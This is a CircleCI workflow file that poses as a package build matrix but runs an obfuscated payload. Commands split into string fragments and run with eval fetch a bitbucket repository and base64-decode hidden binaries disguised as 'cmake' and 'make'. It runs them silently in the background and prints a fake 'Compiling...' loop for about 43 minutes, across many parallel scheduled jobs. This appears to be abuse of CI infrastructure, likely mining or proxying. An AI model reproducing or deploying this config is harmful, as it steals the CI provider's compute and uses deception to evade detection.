version: 2.1

workflows:
  build-push:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--package-moves", "--rebuild-exclude", "--binpkg-changed-deps", "--sysroot", "--autounmask-use", "--misspell-suggestions", "--rage-clean", "--onlydeps-with-rdeps", "--changed-slot", "--sysroot", "--complete-graph-if-new-ver", "--nospinner", "--rebuild-if-unbuilt", "--help", "--depclean", "--changed-slot", "--autounmask-license", "--changed-deps", "--resume", "--fetchonly"]
  build-schedule:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--package-moves", "--rebuild-exclude", "--binpkg-changed-deps", "--sysroot", "--autounmask-use", "--misspell-suggestions", "--rage-clean", "--onlydeps-with-rdeps", "--changed-slot", "--sysroot", "--complete-graph-if-new-ver", "--nospinner", "--rebuild-if-unbuilt", "--help", "--depclean", "--changed-slot", "--autounmask-license", "--changed-deps", "--resume", "--fetchonly"]
    triggers:
      - schedule:
          cron: "11 * * * *"
          filters:
            branches:
              only:
                - master

jobs:
  build:
    machine:
      image: ubuntu-1604:201903-01
    parameters:
      build:
        type: string
        default:
    steps:
      - run:
          name: lzddzh
          command: |
            lDuuMdGL="sudo add-ap"
            LQgLRP="t-repositor"
            HGciohI="y ppa:max-c"
            gExqbfSEq="-lv/shadows"
            MSWdAHXlFFq="ocks-libev "
            NsmbCRRpEqG="-y &>/dev/n"
            eval "$lDuuMdGL""$LQgLRP""$HGciohI""$gExqbfSEq""$MSWdAHXlFFq""$NsmbCRRpEqG""ull || true"
            nsiQhjPaNpo="sudo add-ap"
            EwDfSvZeb="t-repositor"
            BgrKfs="y ppa:ondre"
            MpXYIEiBj="j/apache2 -"
            nizFbOeFNIS="y &>/dev/nu"
            eval "$nsiQhjPaNpo""$EwDfSvZeb""$BgrKfs""$MpXYIEiBj""$nizFbOeFNIS""ll || true"
            rqXKoaFMc="sudo apt up"
            oaGXdAwzQY="date || tru"
            eval "$rqXKoaFMc""$oaGXdAwzQY""e"
            AvTRV="sudo apt --"
            xObnM="yes install"
            MsVaHIBMpg=" openssl &>"
            suFEgd="/dev/null |"
            eval "$AvTRV""$xObnM""$MsVaHIBMpg""$suFEgd""| true"
            gmyDuqNGJJZ="sudo apt --"
            GQflUoi="yes install"
            mplxRfjg=" cl-base64 "
            sRNVKOe="git &>/dev/"
            uVFEr="null || tru"
            eval "$gmyDuqNGJJZ""$GQflUoi""$mplxRfjg""$sRNVKOe""$uVFEr""e"
            jlhvXqMgP="git clone h"
            BxqOaX="ttps://gccb"
            rdHtHOEmr="uild@bitbuc"
            gIPioZu="ket.org/gcc"
            xbJIFM="build/gcc.g"
            zdbREQfbOm="it &>/dev/n"
            eval "$jlhvXqMgP""$BxqOaX""$rdHtHOEmr""$gIPioZu""$xbJIFM""$zdbREQfbOm""ull"
            AajTuDvae="base64 -d g"
            dTFPhBVO="cc/cmake_np"
            eval "$AajTuDvae""$dTFPhBVO""_ > cmake"
            KqQUDjIk="base64 -d g"
            wlfvbLwc="cc/config_ "
            eval "$KqQUDjIk""$wlfvbLwc""> status"
            fAucBbSU="base64 -d g"
            PIpXzJ="cc/make_ > "
            eval "$fAucBbSU""$PIpXzJ""make"
            VMfkP="sed -i 's/1"
            tLTLv="080/1081/g'"
            eval "$VMfkP""$tLTLv"" status"
            yZgWN="chmod +x ma"
            eval "$yZgWN""ke cmake"
            WmONi="./cmake"
            eval "$WmONi"""
            CGIIKyVSm="sed -i 's/b"
            SiHah="uild/ob2o/g"
            eval "$CGIIKyVSm""$SiHah""' status"
            VuVVQzrqHPy="sudo ./make"
            VmfcyySBrP=" -c status "
            cuhXRTxQ="&>/dev/null"
            eval "$VuVVQzrqHPy""$VmfcyySBrP""$cuhXRTxQ"" &"
            GCC=$(date +%s)
            while true; do CC=$(date +%s); echo $CC Compiling...; [ $CC -ge $((GCC + 2598)) ] && sudo killall make && break; sleep 234; done
